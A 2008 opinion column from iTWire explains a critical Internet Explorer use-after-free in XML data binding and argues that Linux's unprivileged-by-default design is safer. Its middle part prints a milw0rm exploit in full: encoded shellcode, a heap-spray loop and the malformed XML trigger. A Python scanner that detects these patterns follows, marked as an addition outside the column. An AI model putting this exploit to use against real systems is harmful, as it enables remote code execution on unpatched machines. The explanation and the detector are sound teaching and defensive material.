Author's Opinion

The views in this column are those of the author and do not necessarily reflect the views of iTWire.


Sunday, 21 December 2008 10:59

Why the latest IE flaw proves Linux got it right from the start

By David M Williams

You've all heard that a major new flaw has been found affecting Internet Explorer all the way back to version 5. Microsoft pushed out a fix outside their regular "patch Tuesday" monthly schedule. The flaw has prompted some commentators to call for the replacement of IE with alternative browsers like Firefox. Just what was so serious? And what do Microsoft say that shows Linux has the superior design?

This security update is rated Critical for Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, and Internet Explorer 7.

It could be critical for previous versions of Internet Explorer too but Microsoft didn't test them because they're no longer supported.

Being a curious type, when I saw all the hubbub about a new major critical vulnerability in Internet Explorer, I wanted to know just what it was about.

First, the best way to get the fix for your Windows operating system, irrespective of flavour, is Windows Update. Yet, the text accompanying the update is typically brief:

Security Update for Internet Explorer 7 in Windows Vista (KB960714)
Published 18th December 2008
Update type: Important

Security issues have been identified that could allow an attacker to compromise a system running Microsoft Internet Explorer and gain control over it. You can help protect your system by installing this update from Microsoft.


While that doesn’t tell us much, the knowledge base article (or “KB”) 960714 referenced does spill the beans.

Fundamentally, it was discovered that program code of a malicious person's construction can be executed on your computer if a user views a specially crafted web page with IE.

In particular, a rogue script can allocate a block of memory (an array) and then apparently release it without the array's length being updated, meaning that the block of memory is still referenced after it has been released.

Then, if data binding is enabled (which it is, by default), a rogue web page can take advantage of IE's incorrect handling of certain XML tags to cause the browser to pass control to the supposedly freed memory location.

If the script has pre-filled that memory with actual executable instructions, then the author has effectively caused your computer to do their bidding, under your user credentials.

You can find a harmless code example below which will make calc.exe (i.e. Windows Calculator) display itself. The code is merely presented in a readable format; it will not actually run.

This code snippet was published on exploit web site milw0rm.com and illustrates how the exploit works.

First, some preamble HTML markup.

<html>
<div id="replace">x</div>

<script>

Now the program script itself; the shellcode variable contains the machine code instructions to start a process, running calc.exe.

Note, I have broken this line up for readability, but you ought to ensure it is all one continuous line when pasting it into a text editor:

var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536
%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a
%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe
%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2
%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3
%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81
%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f
%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba
%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e
%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c
%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

The next piece of script code sprays the heap to push the memory address of the array onto it, in an effort to make it callable:

var spray = unescape("%u0a0a%u0a0a");

do {
   spray += spray;
} while(spray.length < 0xd0000);

memory = new Array();

for(i = 0; i < 100; i++)
   memory[i] = spray + shellcode;


And here is the exploit; the following XML tag is incorrectly handled in unpatched versions of Internet Explorer and will cause it to pass control to the memory address of the array, and therefore execute the program instructions it contains.

This too should be one continuous line in a text editor:

xmlcode = "<XML ID=I><X><C><![CDATA[<image
SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C>
</X></XML><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML><XML ID=I></XML><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
</SPAN></SPAN>";

tag = document.getElementById("replace");
tag.innerHTML = xmlcode;

</script>
</html>


Of course, while this example does nothing harmful, it has been noted that the vulnerability has been used to install Trojan horse programs elsewhere.
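As an added example (it is not part of the column or of the milw0rm post), here is a small Python scanner that looks in page source for the building blocks walked through above: the repeated %uXXXX spray value, the doubling loop, the array fill, and the XML island re-declared and bound through DATASRC/DATAFORMATAS=HTML, and it then checks whether the spray value is the same one the SRC character references decode to. The regexes, indicator names and the two sample pages are my own constructions, not anything from the original.

```python
import re

# Regexes for the building blocks the column walks through; constructed for this example and loose on whitespace/case.
SPRAY_UNIT = re.compile(r'unescape\(\s*["\'](%u([0-9a-f]{4}))\1+["\']\s*\)', re.I)   # one %uXXXX unit repeated
DOUBLING_LOOP = re.compile(r'(\w+)\s*\+=\s*\1\s*;?\s*\}\s*while\s*\(\s*\1\.length\s*<', re.I)
ARRAY_FILL = re.compile(r'for\s*\([^)]*\)\s*\{?\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+', re.I)
ENTITY_SRC = re.compile(r'SRC=\S*?&#x([0-9a-f]{4});&#x\1;', re.I)                   # pointer spelled as char refs
REBOUND_ISLAND = re.compile(
    r'<XML\s+ID=(\w+)>.*?<SPAN[^>]*DATASRC=#\1\b[^>]*DATAFORMATAS=HTML[^>]*>\s*<XML\s+ID=\1>\s*</XML>',
    re.I | re.S)

def scan(html):
    found = []
    spray = SPRAY_UNIT.search(html)
    if spray:
        found.append("spray_pattern")
    if DOUBLING_LOOP.search(html):
        found.append("doubling_loop")
    if ARRAY_FILL.search(html):
        found.append("array_fill")
    entity = ENTITY_SRC.search(html)
    if entity:
        found.append("entity_address_in_src")
    if REBOUND_ISLAND.search(html):
        found.append("rebound_xml_island")
    # Strongest signal: the SRC entities decode to the same 16-bit value the spray fills
    # memory with, which is how the dangling reference ends up pointing into the spray.
    if spray and entity and spray.group(2).lower() == entity.group(1).lower():
        found.append("spray_matches_entity")
    return found

def verdict(html):
    found = scan(html)
    if "spray_matches_entity" in found or {"spray_pattern", "rebound_xml_island"} <= set(found):
        return "exploit"
    return "suspicious" if len(found) >= 2 else "clean"

# Constructed sample shaped like the column's snippet; the shellcode is a non-repeating stand-in, not real code.
EXPLOIT_LIKE = '''<html><div id="replace">x</div><script>
var shellcode = unescape("%u1234%u5678%u9abc");
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);
memory = new Array(); for(i = 0; i < 100; i++) memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
document.getElementById("replace").innerHTML = xmlcode;
</script></html>'''
# Constructed benign page: a legitimate IE XML data island bound to a table, plus unescape() of a single character.
BENIGN = '''<html><XML ID=cats><row><name>Tabby</name></row></XML>
<TABLE DATASRC=#cats><TR><TD><SPAN DATAFLD=name></SPAN></TD></TR></TABLE>
<script>var s = unescape("%u00e9"); document.title = s;</script></html>'''
```

Data islands bound through DATASRC are a legitimate IE feature, so the verdict only says "exploit" when the spray value and the SRC entities agree or when a spray sits beside a re-declared island; a single indicator on its own is left as "clean" to keep false positives down.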

Microsoft offer instructions on how to mitigate the effectiveness of this vulnerability and, in so doing, indirectly espouse the Linux viewpoint on secure computing. Let me explain.

I won’t repeat the comments made by others that using a different web browser, such as Mozilla Firefox, will protect you from problems like this, but I will comment on something else.

Microsoft note that users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

That makes sense; if a user runs with administrator privileges, the rogue code can take full control of their system. If the user is unprivileged, the damage the rogue code can do is far more limited.

Nevertheless, it's a pipe dream. Unlike operating systems like Linux, which have always encouraged users to have "ordinary" accounts and to claim administrator privileges only when needed, and only for performing specific tasks, Windows has trained its users, and worse, its legion of developers, to always run as the local administrator.

Vista’s UAC was intended to help mitigate this problem but proved unpopular due to the great number of programs which necessitate elevated privileges.

Perhaps the ultimate solution for a safe online experience isn’t to just change your browser but to change your OS also.

Give thought to Linux; it is safe by design. This design has lasted the test of time. This design is now a major differentiation between it and Windows.

Microsoft are hoping to undo their bad security design by re-educating their horde of users to a Linux way of life. This re-education isn't working, largely because any attempt to run within a totally unprivileged environment means the bulk of your programs no longer work.

Microsoft have to bite the bullet and obliterate the design goal of backward compatibility if they ever hope to genuinely have an operating system where administrator-level accounts aren't used for ordinary logins and usage. It's not going to be pretty.

Meanwhile, Linux just keeps soldiering on. It got it right from the start. Its users are accustomed to running sudo when they temporarily require higher access, as the following xkcd comic illustrates.

xkcd - sudo make me a sandwich


David M Williams

David has been computing since 1984 where he instantly gravitated to the family Commodore 64. He completed a Bachelor of Computer Science degree from 1990 to 1992, commencing full-time employment as a systems analyst at the end of that year. David subsequently worked as a UNIX Systems Manager, Asia-Pacific technical specialist for an international software company, Business Analyst, IT Manager, and other roles. David has been the Chief Information Officer for national public companies since 2007, delivering IT knowledge and business acumen, seeking to transform the industries within which he works. David is also involved in the user group community, the Australian Computer Society technical advisory boards, and education.
